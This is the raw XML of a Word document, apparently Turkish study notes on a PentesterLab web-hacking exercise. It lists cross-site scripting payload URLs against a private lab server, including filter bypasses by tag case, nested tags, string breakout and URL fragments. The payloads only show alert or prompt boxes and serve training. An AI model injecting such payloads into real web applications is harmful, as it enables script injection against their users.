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5A5" w:rsidRPr="00911073" w:rsidRDefault="005205A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911073">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>XSS Açıkları:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00564C2F" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="002216A9">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/web_for_pentester</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002216A9" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="001E7665" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example1.php?name=&lt;script&gt;alert(“Hello”)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002216A9">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002216A9" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="001E7665" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example2.php?name=&lt;Script&gt;alert(“Hello”)&lt;/scripT&gt;</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001E7665" w:rsidRDefault="00911073" w:rsidP="001E7665">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="001E7665" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example2.php?name=&lt;Scri&lt;script&gt;pt&gt;alert(“Hello”)&lt;/scr&lt;/script&gt;ipT&gt;</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001E7665" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="001E7665" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example2.php?name=&lt;script&gt;prompt('Hi!')&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001E7665" w:rsidRPr="001E7665">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002216A9" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="002216A9" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example5.php?name=&lt;script&gt;prompt(“Hi!”)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002216A9">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002216A9" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="002216A9" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example6.php?name=hi’;alert(‘Hi’);//</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001E7665" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="001E7665">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example7.php?name=hi';alert('Hi');//</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001E7665" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="001E7665" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example8.php/”&gt;&lt;script&gt;alert(“Hi”)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001E7665">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E7665" w:rsidRDefault="00911073">
      <w:hyperlink r:id="rId13" w:anchor="&lt;script&gt;alert(" w:history="1">
        <w:r w:rsidR="00441166" w:rsidRPr="00BD320D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://192.168.32.136/xss/example9.php#&lt;script&gt;alert(“Hi”)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00441166">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441166" w:rsidRDefault="00441166"/>
    <w:p w:rsidR="00441166" w:rsidRDefault="00441166"/>
    <w:sectPr w:rsidR="004411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6A9"/>
    <w:rsid w:val="001E7665"/>
    <w:rsid w:val="002216A9"/>
    <w:rsid w:val="00441166"/>
    <w:rsid w:val="005205A5"/>
    <w:rsid w:val="00564C2F"/>
    <w:rsid w:val="00911073"/>
    <w:rsid w:val="00A4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8851"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1B147DE1-D022-41AD-83F0-DE9A0E3D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216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32.136/xss/example2.php?name=%3cscript%3eprompt('Hi!')%3c/script" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.32.136/xss/example9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32.136/xss/example2.php?name=%3cScri%3cscript%3ept%3ealert(" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.32.136/xss/example8.ph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32.136/xss/example2.php?name=%3cScript%3ealert(" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.32.136/xss/example7.php?name=hi%27;alert(%27Hi%27);//" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.32.136/xss/example1.php?name=%3cscript%3ealert(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92.168.32.136/xss/example6.php?name=hi';alert('Hi');//" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesterlab.com/exercises/web_for_pentester" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.32.136/xss/example5.php?name=%3cscript%3eprompt(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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-08T08:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-06T00:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>